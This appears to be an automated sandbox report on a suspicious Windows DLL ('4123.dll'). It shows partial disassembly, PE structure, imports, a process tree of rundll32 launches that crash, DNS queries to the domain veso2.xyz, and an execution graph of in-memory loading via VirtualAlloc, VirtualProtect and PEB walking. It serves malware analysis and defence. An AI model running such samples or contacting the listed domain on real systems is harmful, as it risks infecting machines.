push edi
push esi
push ebx
call eax
test eax, eax
je 00007FDD60AAC09Eh
push edi
push esi
push ebx
call 00007FDD60AABFAAh
test eax, eax
jne 00007FDD60AAC096h
xor eax, eax
jmp 00007FDD60AAC0E0h
push edi
push esi
push ebx
call 00007FDD60AAC0EEh
cmp esi, 01h
mov dword ptr [ebp+0Ch], eax
jne 00007FDD60AAC09Eh
test eax, eax
jne 00007FDD60AAC0C9h
push edi
push eax
push ebx
call 00007FDD60AABF86h
test esi, esi
je 00007FDD60AAC097h
cmp esi, 03h
jne 00007FDD60AAC0B8h
push edi
push esi
push ebx
call 00007FDD60AABF75h
test eax, eax
jne 00007FDD60AAC095h
and dword ptr [ebp+0Ch], eax
cmp dword ptr [ebp+0Ch], 00000000h
je 00007FDD60AAC0A3h
mov eax, dword ptr [10003794h]
test eax, eax
je 00007FDD60AAC09Ah
push edi
push esi
push ebx
call eax
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 000Ch
jmp dword ptr [10002034h]
jmp dword ptr [1000203Ch]
cmp dword ptr [esp+08h], 01h
jne 00007FDD60AAC0A5h
cmp dword ptr [10003794h], 00000000h
jne 00007FDD60AAC09Ch
push dword ptr [esp+04h]
call dword ptr [1000200Ch]
push 00000001h
pop eax
retn 000Ch

Rich Headers

Programming Language:
  • [ C ] VS98 (6.0) build 8168
  • [RES] VS98 (6.0) cvtres build 1720
  • [C++] VS98 (6.0) build 8168
  • [LNK] VS98 (6.0) imp/exp build 8168

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x22300x48.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x204c0x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x6920.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0xb0000xcc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x48.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000xb6a0x1000False0.48388671875data5.19561194668IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x20000x2780x1000False0.093505859375data1.04880421735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x30000x7a00x1000False0.10888671875data1.05286308404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x40000x69200x7000False0.882184709821data7.55339146769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0xb0000x60e0x1000False0.057861328125data0.51201509742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_ICON0x42a00x2e8dataEnglishUnited States
RT_ICON0x45880x128GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_ICON0x46d80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
RT_MENU0xa7500x4adataEnglishUnited States
RT_DIALOG0xa7b00xfadataEnglishUnited States
RT_STRING0xa8b00x6adataEnglishUnited States
RT_ACCELERATOR0xa7a00x10dataEnglishUnited States
RT_MESSAGETABLE0x48180x5f33dataEnglishUnited States
RT_GROUP_ICON0x46b00x22dataEnglishUnited States
RT_GROUP_ICON0x48000x14dataEnglishUnited States

Imports

DLLImport
KERNEL32.dllExitProcess, LoadLibraryW, GetProcAddress, DisableThreadLibraryCalls
MSVCP60.dll??0Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ
MSVCRT.dllmalloc, free, atoi, __dllonexit, _onexit, _initterm, _adjust_fdiv

Exports

NameOrdinalAddress
DF110x10001530

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 8, 2021 14:29:22.020349979 CEST4925753192.168.2.48.8.8.8
Apr 8, 2021 14:29:23.145103931 CEST4925753192.168.2.48.8.8.8
Apr 8, 2021 14:29:23.159771919 CEST53492578.8.8.8192.168.2.4
Apr 8, 2021 14:29:24.749634027 CEST6238953192.168.2.48.8.8.8
Apr 8, 2021 14:29:24.762242079 CEST53623898.8.8.8192.168.2.4
Apr 8, 2021 14:29:25.518115044 CEST4991053192.168.2.48.8.8.8
Apr 8, 2021 14:29:25.533590078 CEST53499108.8.8.8192.168.2.4
Apr 8, 2021 14:29:27.145659924 CEST5585453192.168.2.48.8.8.8
Apr 8, 2021 14:29:27.181631088 CEST53558548.8.8.8192.168.2.4
Apr 8, 2021 14:29:27.253982067 CEST6454953192.168.2.48.8.8.8
Apr 8, 2021 14:29:27.267417908 CEST53645498.8.8.8192.168.2.4
Apr 8, 2021 14:29:27.925820112 CEST6315353192.168.2.48.8.8.8
Apr 8, 2021 14:29:27.939580917 CEST53631538.8.8.8192.168.2.4
Apr 8, 2021 14:29:28.556616068 CEST5299153192.168.2.48.8.8.8
Apr 8, 2021 14:29:28.571469069 CEST53529918.8.8.8192.168.2.4
Apr 8, 2021 14:29:30.480237961 CEST5370053192.168.2.48.8.8.8
Apr 8, 2021 14:29:30.495018005 CEST53537008.8.8.8192.168.2.4
Apr 8, 2021 14:29:37.059997082 CEST5172653192.168.2.48.8.8.8
Apr 8, 2021 14:29:37.077299118 CEST53517268.8.8.8192.168.2.4
Apr 8, 2021 14:29:37.171709061 CEST5679453192.168.2.48.8.8.8
Apr 8, 2021 14:29:37.186023951 CEST53567948.8.8.8192.168.2.4
Apr 8, 2021 14:29:41.178985119 CEST5653453192.168.2.48.8.8.8
Apr 8, 2021 14:29:41.192791939 CEST53565348.8.8.8192.168.2.4
Apr 8, 2021 14:29:53.069598913 CEST5662753192.168.2.48.8.8.8
Apr 8, 2021 14:29:53.083688021 CEST53566278.8.8.8192.168.2.4
Apr 8, 2021 14:30:02.037838936 CEST5662153192.168.2.48.8.8.8
Apr 8, 2021 14:30:02.050606012 CEST53566218.8.8.8192.168.2.4
Apr 8, 2021 14:30:09.091437101 CEST6311653192.168.2.48.8.8.8
Apr 8, 2021 14:30:09.231167078 CEST53631168.8.8.8192.168.2.4
Apr 8, 2021 14:30:09.779707909 CEST6407853192.168.2.48.8.8.8
Apr 8, 2021 14:30:09.925051928 CEST53640788.8.8.8192.168.2.4
Apr 8, 2021 14:30:10.395690918 CEST6480153192.168.2.48.8.8.8
Apr 8, 2021 14:30:10.410343885 CEST53648018.8.8.8192.168.2.4
Apr 8, 2021 14:30:10.756151915 CEST6172153192.168.2.48.8.8.8
Apr 8, 2021 14:30:10.793107033 CEST53617218.8.8.8192.168.2.4
Apr 8, 2021 14:30:13.918431997 CEST5125553192.168.2.48.8.8.8
Apr 8, 2021 14:30:13.932979107 CEST53512558.8.8.8192.168.2.4
Apr 8, 2021 14:30:14.776710033 CEST6152253192.168.2.48.8.8.8
Apr 8, 2021 14:30:14.791197062 CEST53615228.8.8.8192.168.2.4
Apr 8, 2021 14:30:15.563446045 CEST5233753192.168.2.48.8.8.8
Apr 8, 2021 14:30:15.841141939 CEST53523378.8.8.8192.168.2.4
Apr 8, 2021 14:30:16.507224083 CEST5504653192.168.2.48.8.8.8
Apr 8, 2021 14:30:16.520334005 CEST53550468.8.8.8192.168.2.4
Apr 8, 2021 14:30:16.786179066 CEST4961253192.168.2.48.8.8.8
Apr 8, 2021 14:30:16.800784111 CEST53496128.8.8.8192.168.2.4
Apr 8, 2021 14:30:18.016479015 CEST4928553192.168.2.48.8.8.8
Apr 8, 2021 14:30:18.030330896 CEST53492858.8.8.8192.168.2.4
Apr 8, 2021 14:30:20.112616062 CEST5060153192.168.2.48.8.8.8
Apr 8, 2021 14:30:20.125422001 CEST53506018.8.8.8192.168.2.4
Apr 8, 2021 14:30:20.256707907 CEST6087553192.168.2.48.8.8.8
Apr 8, 2021 14:30:20.272202969 CEST53608758.8.8.8192.168.2.4
Apr 8, 2021 14:30:20.707715988 CEST5644853192.168.2.48.8.8.8
Apr 8, 2021 14:30:20.721771955 CEST53564488.8.8.8192.168.2.4
Apr 8, 2021 14:30:23.934767008 CEST5917253192.168.2.48.8.8.8
Apr 8, 2021 14:30:23.950438976 CEST53591728.8.8.8192.168.2.4
Apr 8, 2021 14:30:24.609482050 CEST6242053192.168.2.48.8.8.8
Apr 8, 2021 14:30:24.627530098 CEST53624208.8.8.8192.168.2.4
Apr 8, 2021 14:30:25.777808905 CEST6057953192.168.2.48.8.8.8
Apr 8, 2021 14:30:25.790393114 CEST53605798.8.8.8192.168.2.4
Apr 8, 2021 14:30:27.415144920 CEST5018353192.168.2.48.8.8.8
Apr 8, 2021 14:30:27.610382080 CEST6153153192.168.2.48.8.8.8
Apr 8, 2021 14:30:27.623883963 CEST53615318.8.8.8192.168.2.4
Apr 8, 2021 14:30:28.419294119 CEST5018353192.168.2.48.8.8.8
Apr 8, 2021 14:30:28.433654070 CEST53501838.8.8.8192.168.2.4
Apr 8, 2021 14:30:31.079299927 CEST4922853192.168.2.48.8.8.8
Apr 8, 2021 14:30:31.095681906 CEST53492288.8.8.8192.168.2.4
Apr 8, 2021 14:30:31.725174904 CEST5979453192.168.2.48.8.8.8
Apr 8, 2021 14:30:31.739020109 CEST53597948.8.8.8192.168.2.4
Apr 8, 2021 14:30:32.307065010 CEST5591653192.168.2.48.8.8.8
Apr 8, 2021 14:30:32.328953981 CEST53559168.8.8.8192.168.2.4
Apr 8, 2021 14:30:42.842799902 CEST5275253192.168.2.48.8.8.8
Apr 8, 2021 14:30:43.843122005 CEST5275253192.168.2.48.8.8.8
Apr 8, 2021 14:30:43.857826948 CEST53527528.8.8.8192.168.2.4
Apr 8, 2021 14:30:57.447335958 CEST6054253192.168.2.48.8.8.8
Apr 8, 2021 14:30:57.461633921 CEST53605428.8.8.8192.168.2.4
Apr 8, 2021 14:30:58.493922949 CEST6068953192.168.2.48.8.8.8
Apr 8, 2021 14:30:58.509104013 CEST53606898.8.8.8192.168.2.4
Apr 8, 2021 14:30:59.168838024 CEST6420653192.168.2.48.8.8.8
Apr 8, 2021 14:30:59.183671951 CEST53642068.8.8.8192.168.2.4
Apr 8, 2021 14:31:00.355638027 CEST5090453192.168.2.48.8.8.8
Apr 8, 2021 14:31:00.368513107 CEST53509048.8.8.8192.168.2.4
Apr 8, 2021 14:31:01.140944004 CEST5752553192.168.2.48.8.8.8
Apr 8, 2021 14:31:02.140784979 CEST5752553192.168.2.48.8.8.8
Apr 8, 2021 14:31:02.154592037 CEST53575258.8.8.8192.168.2.4
Apr 8, 2021 14:31:03.415580988 CEST5381453192.168.2.48.8.8.8
Apr 8, 2021 14:31:03.428740025 CEST53538148.8.8.8192.168.2.4
Apr 8, 2021 14:31:03.688951969 CEST5341853192.168.2.48.8.8.8
Apr 8, 2021 14:31:04.687899113 CEST5341853192.168.2.48.8.8.8
Apr 8, 2021 14:31:04.702517033 CEST53534188.8.8.8192.168.2.4
Apr 8, 2021 14:31:05.423943996 CEST6283353192.168.2.48.8.8.8
Apr 8, 2021 14:31:05.438870907 CEST53628338.8.8.8192.168.2.4

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Apr 8, 2021 14:29:27.145659924 CEST192.168.2.48.8.8.80x66a5Standard query (0)veso2.xyzA (IP address)IN (0x0001)
Apr 8, 2021 14:29:27.253982067 CEST192.168.2.48.8.8.80x2abbStandard query (0)veso2.xyzA (IP address)IN (0x0001)
Apr 8, 2021 14:29:30.480237961 CEST192.168.2.48.8.8.80xff2Standard query (0)veso2.xyzA (IP address)IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7088 Parent PID: 6080

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\4123.dll'
Imagebase:0x13a0000
File size:116736 bytes
MD5 hash:542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7100 Parent PID: 7088

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 7120 Parent PID: 7088

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\4123.dll,DF1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 7132 Parent PID: 7100

General

Start time:14:29:26
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 6652 Parent PID: 7132

General

Start time:14:29:28
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 6636 Parent PID: 7120

General

Start time:14:29:28
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 5752 Parent PID: 7088

General

Start time:14:29:29
Start date:08/04/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1
Imagebase:0x11c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: WerFault.exe PID: 5948 Parent PID: 5752

General

Start time:14:29:31
Start date:08/04/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008
Imagebase:0xae0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: rundll32.exe PID: 7120 Parent PID: 7088 rundll32.exeCOMMON

    Execution Graph

    Execution Coverage:24.5%
    Dynamic/Decrypted Code Coverage:85.2%
    Signature Coverage:23.2%
    Total number of Nodes:345
    Total number of Limit Nodes:15

    Graph

    execution_graph 2553 10001000 2554 10001005 2553->2554 2557 100019d7 2554->2557 2560 100019ab 2557->2560 2559 1000103a 2561 100019c0 __dllonexit 2560->2561 2562 100019b4 _onexit 2560->2562 2561->2559 2562->2559 2563 11a1890 FreeLibrary 2654 11641c6 2655 11641d6 2654->2655 2656 11641d8 2654->2656 2658 1164356 2656->2658 2659 1164367 2658->2659 2662 1164266 2659->2662 2661 116445e 2661->2655 2671 11647f6 2662->2671 2664 11642a8 2665 11647f6 3 API calls 2664->2665 2666 11642e9 2665->2666 2670 1164327 2666->2670 2677 1164506 ExitProcess 2666->2677 2670->2661 2672 1164803 2671->2672 2672->2672 2673 11648a3 atoi _initterm 2672->2673 2674 116490f 2673->2674 2676 1164916 2673->2676 2674->2664 2675 1164ba0 _onexit 2675->2674 2676->2674 2676->2675 2288 1160000 2290 1160005 2288->2290 2293 116002d 2290->2293 2313 1160456 GetPEB 2293->2313 2296 1160456 GetPEB 2297 1160053 2296->2297 2298 1160456 GetPEB 2297->2298 2299 1160061 2298->2299 2300 1160456 GetPEB 2299->2300 2301 116006d 2300->2301 2302 1160456 GetPEB 2301->2302 2303 116007b 2302->2303 2304 1160456 GetPEB 2303->2304 2307 1160089 2304->2307 2305 11600e4 GetNativeSystemInfo 2306 1160107 VirtualAlloc 2305->2306 2311 1160029 2305->2311 2309 116012f 2306->2309 2307->2305 2307->2311 2308 11603b2 2315 11a2690 2308->2315 2309->2308 2310 1160388 VirtualProtect 2309->2310 2310->2309 2310->2311 2314 1160045 2313->2314 2314->2296 2318 11a1000 2315->2318 2321 11a1030 LoadLibraryW GetProcAddress 2318->2321 2363 11a1b30 2321->2363 2324 11a10a3 2326 11a1b30 SetLastError 2324->2326 2325 11a1091 SetLastError 2358 11a102b 2325->2358 2327 11a10b9 2326->2327 2328 11a10de SetLastError 2327->2328 2329 11a10f0 2327->2329 2327->2358 2328->2358 2330 11a10ff SetLastError 2329->2330 2331 11a1111 2329->2331 2330->2358 2332 11a111c SetLastError 2331->2332 2334 11a112e GetNativeSystemInfo 2331->2334 2332->2358 2335 11a11bc 2334->2335 2336 11a11e9 2335->2336 2337 11a11d7 SetLastError 2335->2337 2366 11a1800 VirtualAlloc 2336->2366 2337->2358 2338 11a1202 2339 11a123d GetProcessHeap RtlAllocateHeap 2338->2339 2367 11a1800 VirtualAlloc 2338->2367 2340 11a127b 2339->2340 2341 11a1257 SetLastError 2339->2341 2345 11a1b30 SetLastError 2340->2345 2341->2358 2342 11a1222 2342->2339 2343 11a122e SetLastError 2342->2343 2343->2358 2346 11a12fb 2345->2346 2347 11a1302 2346->2347 2368 11a1800 VirtualAlloc 2346->2368 2399 11a16c0 2347->2399 2348 11a1320 2369 11a1b50 2348->2369 2351 11a136b 2351->2347 2375 11a21a0 2351->2375 2355 11a13ca 2355->2347 2356 11a13eb 2355->2356 2357 11a13ff GetPEB 2356->2357 2356->2358 2394 11b1000 2357->2394 2358->2311 2364 11a1b3b SetLastError 2363->2364 2365 11a1070 2363->2365 2364->2365 2365->2324 2365->2325 2365->2358 2366->2338 2367->2342 2368->2348 2371 11a1b7d 2369->2371 2370 11a1b30 SetLastError 2372 11a1c32 2370->2372 2371->2370 2373 11a1be9 2371->2373 2372->2373 2407 11a1800 VirtualAlloc 2372->2407 2373->2351 2376 11a21dd IsBadHugeReadPtr 2375->2376 2385 11a13b5 2375->2385 2378 11a2207 2376->2378 2376->2385 2379 11a2239 SetLastError 2378->2379 2380 11a224d 2378->2380 2378->2385 2379->2385 2408 11a1a20 2380->2408 2383 11a2273 SetLastError 2383->2385 2385->2347 2388 11a1e80 2385->2388 2386 11a229d 2386->2385 2387 11a23ae SetLastError 2386->2387 2387->2385 2389 11a1eba 2388->2389 2390 11a1fe5 2389->2390 2392 11a1fc1 2389->2392 2423 11a1d10 2389->2423 2391 11a1d10 2 API calls 2390->2391 2391->2392 2392->2355 2431 11b1f70 2394->2431 2400 11a16d2 2399->2400 2401 11a16d7 2399->2401 2400->2358 2402 11a19d0 VirtualFree 2401->2402 2406 11a170b 2402->2406 2404 11a1770 GetProcessHeap HeapFree 2404->2400 2405 11a19d0 VirtualFree 2405->2404 2406->2404 2406->2405 2407->2373 2409 11a1a35 2408->2409 2410 11a1a2c 2408->2410 2415 11a1a43 2409->2415 2416 11a19f0 VirtualAlloc 2409->2416 2417 11a1900 2410->2417 2413 11a1a51 2413->2415 2420 11a19d0 2413->2420 2415->2383 2415->2386 2416->2413 2418 11a190c 2417->2418 2419 11a1910 VirtualQuery 2417->2419 2418->2409 2419->2418 2421 11a19ea 2420->2421 2422 11a19d9 VirtualFree 2420->2422 2421->2415 2422->2421 2424 11a1d29 2423->2424 2428 11a1d1f 2423->2428 2425 11a1d37 2424->2425 2426 11a1d9d VirtualProtect 2424->2426 2425->2428 2430 11a1820 VirtualFree 2425->2430 2426->2428 2428->2389 2430->2428 2446 11b1b50 2431->2446 2434 11b1fa0 2435 11b1fd6 SetLastError 2434->2435 2436 11b1fe5 2434->2436 2437 11b1039 2435->2437 2438 11b2002 SetLastError 2436->2438 2439 11b2011 2436->2439 2437->2358 2438->2437 2440 11b2023 2439->2440 2445 11b2060 2439->2445 2441 11b2037 SetLastError 2440->2441 2442 11b2046 2440->2442 2441->2437 2442->2437 2444 11b20f8 SetLastError 2442->2444 2443 11b20e1 SetLastError 2443->2437 2444->2437 2445->2442 2445->2443 2483 11b1270 2446->2483 2449 11b1b93 SetLastError 2472 11b1025 2449->2472 2450 11b1ba5 2451 11b1270 SetLastError 2450->2451 2452 11b1bbe 2451->2452 2453 11b1bf2 2452->2453 2454 11b1be0 SetLastError 2452->2454 2452->2472 2455 11b1c13 2453->2455 2456 11b1c01 SetLastError 2453->2456 2454->2472 2457 11b1c1e SetLastError 2455->2457 2459 11b1c30 GetNativeSystemInfo 2455->2459 2456->2472 2457->2472 2460 11b1cf6 VirtualAlloc 2459->2460 2461 11b1ce4 SetLastError 2459->2461 2462 11b1d42 GetProcessHeap HeapAlloc 2460->2462 2463 11b1d17 VirtualAlloc 2460->2463 2461->2472 2465 11b1d7c 2462->2465 2466 11b1d5c VirtualFree SetLastError 2462->2466 2463->2462 2464 11b1d33 SetLastError 2463->2464 2464->2472 2467 11b1270 SetLastError 2465->2467 2466->2472 2468 11b1ded 2467->2468 2469 11b1dfb VirtualAlloc 2468->2469 2481 11b1df1 2468->2481 2470 11b1e2a 2469->2470 2486 11b12a0 2470->2486 2472->2434 2474 11b1e5e 2474->2481 2496 11b18c0 2474->2496 2478 11b1ec7 2478->2481 2517 4851010 2478->2517 2480 11b1f1f SetLastError 2480->2481 2481->2472 2521 11b2120 2481->2521 2484 11b128b 2483->2484 2485 11b127f SetLastError 2483->2485 2484->2449 2484->2450 2484->2472 2485->2484 2487 11b12d0 2486->2487 2488 11b1363 2487->2488 2489 11b1380 2487->2489 2490 11b130c VirtualAlloc 2487->2490 2491 11b1270 SetLastError 2488->2491 2489->2474 2492 11b1330 2490->2492 2493 11b1337 2490->2493 2494 11b137c 2491->2494 2492->2489 2493->2487 2494->2489 2495 11b1384 VirtualAlloc 2494->2495 2495->2489 2497 11b1900 IsBadReadPtr 2496->2497 2498 11b18f6 2496->2498 2497->2498 2500 11b192a 2497->2500 2498->2481 2511 11b15b0 2498->2511 2500->2498 2528 11b1af0 LoadLibraryA 2500->2528 2502 11b195c SetLastError 2502->2498 2503 11b1970 2530 11b1170 2503->2530 2506 11b19c0 2506->2498 2509 11b1ad1 SetLastError 2506->2509 2507 11b1996 SetLastError 2507->2498 2509->2498 2513 11b15f8 2511->2513 2512 11b1701 2514 11b1460 2 API calls 2512->2514 2513->2512 2515 11b16dd 2513->2515 2538 11b1460 2513->2538 2514->2515 2515->2478 2518 11b1f16 2517->2518 2519 4851022 2517->2519 2518->2480 2518->2481 2545 48511a0 13 API calls 2519->2545 2522 11b2135 2521->2522 2527 11b213a 2521->2527 2522->2472 2523 11b21c4 2524 11b21d0 VirtualFree 2523->2524 2525 11b21e4 GetProcessHeap HeapFree 2523->2525 2524->2525 2525->2522 2527->2523 2550 11b1120 2527->2550 2529 11b1950 2528->2529 2529->2502 2529->2503 2531 11b1185 2530->2531 2532 11b117c 2530->2532 2534 11b1140 VirtualAlloc 2531->2534 2537 11b1193 2531->2537 2533 11b1050 VirtualQuery 2532->2533 2533->2531 2535 11b11a1 2534->2535 2536 11b1120 VirtualFree 2535->2536 2535->2537 2536->2537 2537->2506 2537->2507 2539 11b147c 2538->2539 2544 11b1472 2538->2544 2540 11b148a 2539->2540 2542 11b14e4 VirtualProtect 2539->2542 2541 11b14c2 VirtualFree 2540->2541 2540->2544 2541->2544 2542->2544 2544->2513 2546 4851040 6 API calls 2545->2546 2547 48512a3 2546->2547 2548 48510b0 21 API calls 2547->2548 2549 48512a8 2548->2549 2549->2518 2551 11b113a 2550->2551 2552 11b1129 VirtualFree 2550->2552 2551->2523 2552->2551 2564 11b190d 2565 11b1916 IsBadReadPtr 2564->2565 2566 11b192a 2565->2566 2567 11b1ade 2565->2567 2566->2567 2577 11b1af0 LoadLibraryA 2566->2577 2568 11b1950 2569 11b195c SetLastError 2568->2569 2570 11b1970 2568->2570 2569->2567 2571 11b1170 3 API calls 2570->2571 2572 11b198a 2571->2572 2573 11b1996 SetLastError 2572->2573 2575 11b19c0 2572->2575 2573->2567 2575->2567 2576 11b1ad1 SetLastError 2575->2576 2576->2567 2577->2568 2678 11a1840 LoadLibraryA 2679 11a1857 2678->2679 2578 100010a0 2583 100010b0 ??0_Winit@std@@QAE 2578->2583 2681 10001060 2686 10001070 ??0Init@ios_base@std@@QAE 2681->2686 2687 11a157a 2688 11a1688 2687->2688 2689 11a169f 2688->2689 2690 11a1693 SetLastError 2688->2690 2690->2689 2584 10001aa1 2585 10001ab4 2584->2585 2590 10001abd 2584->2590 2586 10001ae5 2585->2586 2601 10001b4a 2585->2601 2590->2585 2590->2586 2594 100019f6 2590->2594 2591 10001b05 2591->2586 2593 100019f6 3 API calls 2591->2593 2592 100019f6 3 API calls 2592->2591 2593->2586 2595 100019fe 2594->2595 2596 10001a1f malloc 2595->2596 2598 10001a34 2595->2598 2600 10001a5e 2595->2600 2597 10001a38 _initterm 2596->2597 2596->2598 2597->2598 2598->2585 2599 10001a8b free 2599->2598 2600->2598 2600->2599 2602 10001b51 2601->2602 2603 10001af1 2601->2603 2602->2603 2604 10001b5a DisableThreadLibraryCalls 2602->2604 2603->2586 2603->2591 2603->2592 2604->2603 2605 1161fbe 2608 116092e 2605->2608 2611 116095e 2608->2611 2610 1160959 2613 116097b 2611->2613 2612 11609a5 2612->2610 2613->2612 2614 1160d2d GetPEB 2613->2614 2614->2612 2615 11a2430 2616 11a243c 2615->2616 2617 11a2441 VirtualProtect 2615->2617 2619 11a2472 2617->2619 2618 11a24a4 VirtualProtect 2618->2616 2619->2616 2619->2618 2691 11a1870 GetProcAddress 2692 11b1df6 2693 11b1f5c 2692->2693 2694 11b2120 4 API calls 2693->2694 2695 11b1f68 2694->2695 2265 10001530 2280 10001100 LoadLibraryW GetProcAddress 2265->2280 2268 10001547 2282 100010e0 GetPEB 2268->2282 2269 1000153c ExitProcess 2272 1000164a 2283 100010e0 GetPEB 2272->2283 2273 100018c3 atoi VirtualAlloc 2284 10001140 2273->2284 2274 100017ac 2274->2273 2276 10001910 2277 10001917 atoi 2276->2277 2278 10001932 2276->2278 2279 10001140 LoadLibraryW 2277->2279 2279->2278 2281 10001122 2280->2281 2281->2268 2281->2269 2282->2272 2283->2274 2285 10001155 2284->2285 2287 1000117b 2284->2287 2286 1000115e LoadLibraryW 2285->2286 2285->2287 2286->2287 2287->2276 2287->2287 2696 11a21ea 2697 11a21f3 IsBadHugeReadPtr 2696->2697 2698 11a23bb 2697->2698 2699 11a2207 2697->2699 2699->2698 2700 11a2239 SetLastError 2699->2700 2701 11a224d 2699->2701 2700->2698 2702 11a1a20 3 API calls 2701->2702 2703 11a2267 2702->2703 2704 11a2273 SetLastError 2703->2704 2706 11a229d 2703->2706 2704->2698 2706->2698 2707 11a23ae SetLastError 2706->2707 2707->2698 2708 10001970 2709 10001978 2708->2709 2710 10001985 2709->2710 2712 100019a0 free 2709->2712 2712->2710 2628 11a14a0 2629 11a14e8 2628->2629 2630 11a14d9 SetLastError 2628->2630 2631 11a1505 SetLastError 2629->2631 2632 11a1514 2629->2632 2642 11a169f 2630->2642 2631->2642 2633 11a1562 2632->2633 2634 11a1527 2632->2634 2637 11a156b SetLastError 2633->2637 2638 11a157f 2633->2638 2635 11a153a SetLastError 2634->2635 2636 11a1549 2634->2636 2635->2642 2636->2642 2643 11a1693 SetLastError 2636->2643 2637->2642 2639 11a1648 bsearch 2638->2639 2647 11a19f0 VirtualAlloc 2638->2647 2639->2636 2641 11a1672 SetLastError 2639->2641 2641->2642 2643->2642 2644 11a15b3 2645 11a15c8 SetLastError 2644->2645 2646 11a15d7 2644->2646 2645->2642 2646->2639 